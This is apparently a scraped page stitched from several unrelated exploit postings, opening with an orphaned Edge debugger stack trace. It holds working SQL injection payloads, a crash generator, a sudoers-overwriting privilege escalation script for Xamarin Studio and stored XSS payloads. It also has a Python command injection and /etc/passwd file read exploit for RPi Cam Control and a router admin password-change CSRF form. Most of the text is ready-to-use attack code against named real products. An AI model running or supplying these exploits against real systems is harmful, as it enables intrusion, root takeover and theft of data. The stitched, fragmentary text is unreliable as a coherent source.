c1 0000004d`4482e7b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
c2 0000004d`4482e930 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
c3 0000004d`4482e9b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
c4 0000004d`4482eb10 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
c5 0000004d`4482eb50 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
c6 0000004d`4482ee20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
c7 0000004d`4482ee70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
c8 0000004d`4482efe0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
c9 0000004d`4482f020 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
ca 0000004d`4482f130 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
cb 0000004d`4482f290 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
cc 0000004d`4482f310 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
cd 0000004d`4482f340 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
ce 0000004d`4482f440 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
cf 0000004d`4482f480 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
d0 0000004d`4482f4c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
d1 0000004d`4482f4f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
d2 0000004d`4482f5d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
d3 0000004d`4482f6b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
d4 0000004d`4482f770 00007ffe`83cf90a3 0x000001fa`1cf7057e
d5 0000004d`4482f800 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
d6 0000004d`4482f850 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
d7 0000004d`4482f8b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
d8 0000004d`4482f9a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
d9 0000004d`4482fa10 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
da 0000004d`4482fab0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
db 0000004d`4482fb40 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
dc 0000004d`4482fbe0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
dd 0000004d`4482fc30 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
de 0000004d`4482fc70 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
df 0000004d`4482fdf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
e0 0000004d`4482fe70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
e1 0000004d`4482ffd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
e2 0000004d`44830010 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
e3 0000004d`448302e0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
e4 0000004d`44830330 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
e5 0000004d`448304a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
e6 0000004d`448304e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
e7 0000004d`448305f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
e8 0000004d`44830750 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
e9 0000004d`448307d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
ea 0000004d`44830800 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
eb 0000004d`44830900 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
ec 0000004d`44830940 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
ed 0000004d`44830980 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
ee 0000004d`448309b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
ef 0000004d`44830a90 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
f0 0000004d`44830b70 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
f1 0000004d`44830c30 00007ffe`83cf90a3 0x000001fa`1cf7057e
f2 0000004d`44830cc0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
f3 0000004d`44830d10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
f4 0000004d`44830d70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
f5 0000004d`44830e60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
f6 0000004d`44830ed0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
f7 0000004d`44830f70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
f8 0000004d`44831000 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
f9 0000004d`448310a0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
fa 0000004d`448310f0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
fb 0000004d`44831130 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
fc 0000004d`448312b0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
fd 0000004d`44831330 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
fe 0000004d`44831490 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
ff 0000004d`448314d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
-->
HireHackking 
# # # # #
# Exploit Title: De-Journal - Academic Journal and Peer Review System 1.0 - SQL Injection
# Dork: N/A
# Date: 11.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/dejournal-academic-journal-and-peer-review-system/19533981
# Demo: https://demo.sarutech.com/dejournal/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Vulnerable Source:
# .....................
# 	if(!isset($_GET['id'])){
# 		redirect('index.php');
# 	}
# ?>
#  
# <?php
# 	$row = $connection->query("SELECT * FROM page WHERE menu='$_GET[id]'");
# .....................
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/page.php?id=[SQL]
# -1'++/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,0x283229,0x283329,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529,0x283629)--+-
# 
# http://localhost/[PATH]/abstract.php?id=[SQL]
# -1'++/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x))--+-
# 
# Etc...
# # # # #
HireHackking 
#!/usr/bin/python

# Exploit Title: Tomabo MP4 Converter DOS
# Date: 13/08/17
# Exploit Author: Andy Bowden
# Vendor Homepage: http://www.tomabo.com/
# Software Link: http://www.tomabo.com/mp4-converter/index.html
# Version: 3.19.15
# Tested on: Windows 7 x86
# CVE : None

#Generate a .m3u file using the python script and import it into the MP4 Converter.

file = "crash.m3u"

buffer = "A" * 550000

f = open(file, "w")
f.write(buffer)
f.close()
HireHackking 
Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html

Abstract

Xamarin Studio is an Integrated Development Environment (IDE) used to create iOS, Mac and Android applications. Xamarin Studio supports developments in C# and F# (by default). The API documentation update mechanism of Xamarin Studio for Mac is installed as setuid root. This update mechanism contains several flaws that could be leveraged by a local attacker to gain elevated (root) privileges.

Tested versions

This issue was successfully verified on Xamarin Studio for Mac version 6.2.1 (build 3) and version 6.3 (build 863).

Fix

Microsoft released a new version of Xamarin.iOS that addresses this issue:
- Security update for the elevation of privilege vulnerability for Xamarin.iOS: August 14, 2017 (4037359)

#!/bin/bash
# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful)
#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard
target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard
rm -rf ~/Library/Developer/Shared/Documentation/DocSets
   
cat << __EOF > /private/tmp/sudoers
%everyone   ALL=(ALL) NOPASSWD: ALL
__EOF
   
cat << __EOF > ~/.curlrc
url=file:///private/tmp/sudoers
output=/private/etc/sudoers
__EOF
   
echo 
echo "*** press CRL+C when the download starts ***"
$target
echo
   
sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -'
   
rm -f /private/tmp/sudoers ~/.curlrc
HireHackking 
# Vulnerability type: Multiple Stored Cross Site Scripting
# Vendor: Quali
# Product: CloudShell
# Affected version: v7.1.0.6508 (Patch 6)
# Patched version: v8 and up
# Credit: Benjamin Lee 
# CVE ID: CVE-2017-9767

==========================================================

# Overview
Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account.

==========================================================

# Vulnerable URL 1 (Reservation Function)
/RM/Reservation/ReserveNew

# Vulnerable parameter(s)
- Name
- Description

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT 
- Go to the "Inventory" tab
- Click on details button on either of the items
- Click on the reserve button and enter the XSS payload onto the affected parameters
- Add users to the permitted user list (e.g. admin accounts)
- Once the user click on the reservation list details, the XSS would be executed

==========================================================

# Vulnerable URL 2 (Environment Function)
/RM/Topology/Update

# Vulnerable parameter(s)
- Description

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT 
- Go to the "Environment" tab
- Click on item properties button
- Enter the XSS payload onto the affected parameters
- Change the owner to another user (e.g. admin accounts)
- Once the user click on the more info button of the item in the environment tab, the XSS would be executed

==========================================================

# Vulnerable URL 3 (Job Scheduling Function)
/SnQ/JobTemplate/Edit?jobTemplateId=<job template id>

# Vulnerable parameter(s)
- Name
- Description
- ExecutionBatches[0].Name
- ExecutionBatches[0].Description
- Labels

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT 
- Go to the "Job Scheduling > Add New Suite" tab
- Enter the XSS payload onto the affected parameters
- Once the user view details of this suite, the XSS would be executed

==========================================================

# Vulnerable URL 4 (Resource Template Function)
/RM/AbstractTemplate/AddOrUpdateAbstractTemplate

# Vulnerable parameter(s)
- Alias
- Description

# Sample payload
'"><script>alert("xss")</script>

# PROOF OF CONCEPT 
- Go to the "Inventory > abstract template > Add New" tab
- Enter the XSS payload onto the affected parameters
- Once the user click on the more info button of the item, the XSS would be executed

==========================================================

# Timeline
- 06/06/2017: Vulnerability found
- 20/06/2017: Vendor informed
- 20/06/2017: Vendor responded and acknowledged
- 16/07/2017: Vendor fixed the issue
- 12/08/2017: Vendor agreed on public disclosure
- 14/08/2017: Public disclosure
HireHackking 
#####
# RPi Cam Control <= v6.3.14 (RCE) preview.php Multiple Vulnerabilities
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Date 16/08/2017
# Discovered by @nopernik (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
#
# Proof of concept:
#####

#!/usr/bin/python

import requests
import sys
if not len(sys.argv[2:]):
   print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
   exit(1)

def GET(target, rfile):
   res = requests.post("http://%s/preview.php" % target,
        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
        data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
   return res.content

def RCE(target, command):
   requests.post("http://%s/preview.php" % target,
        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
        data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
   return GET(target,'/tmp/output.txt')

target = sys.argv[1]
command = sys.argv[2]

print RCE(target,command)
HireHackking 
<!--
# Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery
(Change Admin Password)
# Date: 13 Aug, 2017
# Vendor Homepage : http://www.rtsindia.com/
# Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd.
# Firmware Version : Ver1.0.56
# Exploit Author: Touhid M.Shaikh
# Contact: https://github.com/touhidshaikh
# Website: http://touhidshaikh.com/


===================
Product Description
===================
Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides
Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB
Dongle to get connected to Broadband/ Optionally Uses Wired Broadband
connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and
Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for
Multiple Users to get connected to Broadband. Small & Sleek Portable
Router, Easy to Install & Manage.
-->



<!-- CHANGE ADMIN PASSWORD to test-->
<form action=http://192.168.1.1/goform/formPasswordSetup method=POST
name="password">
    <input type="text" name="username" value="admin">
    <input type="password" name="newpass" value="test">
    <input type="password" name="confpass" value="test">
    <input type="hidden" value="/status.asp" name="submit-url">
    <input type="submit" value="Apply Changes" name="save">
  <input type="reset" value="  Reset  " name="reset" id="password Reset">
</form>
<!-- CHANGE ADMIN PASSWORD Ends here-->


<!---Enable The UPNP Service-->
<form action=http://192.168.1.1/goform/formUpnpSetup method=POST
name="upnpSetup">
  <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes"
checked>
  <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >

<!--
  <input type="radio" name="avupnpfunction" id="avupnpfunctiony"
value="yes" checked>
  <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no"
>
-->
  <input type="submit" value="Apply Changes" name="save" id="upnp apply" >
  <input type="reset" value="  Reset  " name="reset" id="upnp Reset">
  <input type="hidden" value="/upnp.asp" name="submit-url">
</form>
<!---Enable The UPNP Service Ends here-->



<!--
======GREEtZ=====
my cool Broo and Pratik K.tjani
-->
HireHackking

De-Tutor 1.0 - SQL Injection 

# # # # #
# Exploit Title: De-Tutor - Private Tutoring and Admission Processing 1.0 - SQL Injection
# Dork: N/A
# Date: 11.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/detutor-private-tutoring-and-admission-processing/19053430
# Demo: https://demo.sarutech.com/detutor/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Vulnerable Source:
# .....................
# $id = $_GET["id"];
# 
# $statement = $connection->query("SELECT * FROM post WHERE id='$id'");
# .....................
# 	
# Proof of Concept:
# http://localhost/[PATH]/blog-details.php?id=[SQL]
# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,0x283229,0x3c7370616e3e496873616e2053656e63616e3c2f7370616e3e,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529,0x283629)--+-
# 
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection
# Dork: N/A
# Date: 03.08.2017
# Vendor : https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
# Demo: https://www.streetguessr.com/en/component/streetguess/
# Version: 1.1.8
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_streetguess&view=maps&catid=[SQL]
# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+-
# Etc..
# # # # #